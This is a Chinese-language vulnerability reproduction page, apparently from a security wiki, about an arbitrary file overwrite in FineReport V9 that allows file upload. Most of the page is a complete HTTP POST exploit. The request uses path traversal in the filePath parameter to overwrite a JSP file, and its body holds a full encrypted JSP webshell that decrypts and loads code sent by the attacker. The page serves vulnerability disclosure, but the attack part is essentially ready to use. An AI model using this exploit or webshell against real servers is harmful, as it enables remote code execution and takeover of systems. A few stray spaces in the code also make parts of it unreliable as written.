menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 帆软 V9 任意文件覆盖文件上传 chevron_right 帆软 V9 任意文件覆盖文件上传.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    帆软 V9 任意文件覆盖文件上传.md
    1.58 KB / 2021-07-15 20:13:37
        # 帆软 V9 任意文件覆盖文件上传
    
    ## 漏洞描述
    
    帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > 帆软 V9 
    
    ## 漏洞复现
    
    `FineReport V9`
    
    注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件:
    
    `比如:/tomcat-7.0.96/webapps/ROOT/index.jsp`
    
    覆盖 Tomcat 自带 ROOT 目录下的 index.jsp:
    
    ```
    POST /WebReport/ReportServer? op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update .jsp HTTP/1.1 Host: 192.168.169.138:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
    Connection: close
    Accept-Au: 0c42b2f264071be0507acea1876c74
    Content-Type: text/xml;charset=UTF-8
    Content-Length: 675
    
    {"__CONTENT__":"<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter(\"pass\")!=null) {String k=(\"\"+UUID.randomUUID()).replace(\"- \",\"\").substring(16);session.putValue(\"u\",k);out.print(k);return;}Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec((session.getValue(\"u\")+\"\").getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta nce().equals(pageContext);%>","__CHARSET__":"UTF-8"}
    ```
     
    ![](resource/帆软-V9-任意文件覆盖文件上传/media/1.png)
    
    links
    file_download